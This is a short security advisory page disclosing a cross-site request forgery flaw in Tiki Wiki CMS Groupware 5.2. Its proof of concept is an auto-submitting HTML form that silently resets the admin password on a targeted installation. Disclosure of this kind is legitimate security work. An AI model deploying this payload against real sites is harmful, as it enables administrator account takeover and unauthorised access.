Home
Consulting
Advisories
Software
Articles
Contact

Tiki Wiki CMS Groupware 5.2 Cross-site Request Forgery

Legacy Advisories

Description

A cross-site request forgery vulnerability in Tiki Wiki CMS Groupware 5.2 can be exploited to change the admin password.

Proof Of Concept

<html>
    <body onload="document.forms[0].submit.click()">
        <form method="POST" action="http://localhost/tiki-5.2/tiki-adminusers.php">
            <input type="hidden" name="name" value="admin" />
            <input type="hidden" name="pass" value="Password2" />
            <input type="hidden" name="pass2" value="Password2" />
            <input type="hidden" name="genepass" value="" />
            <input type="hidden" name="email" value="test@test.com" />
            <input type="hidden" name="user" value="1" />
            <input type="hidden" name="edituser" value="1" />            
            <input type="submit" name="submit" value="Save" />  
        </form>
    </body>
</html>


Copyright © 2018 AutoSec Tools LLC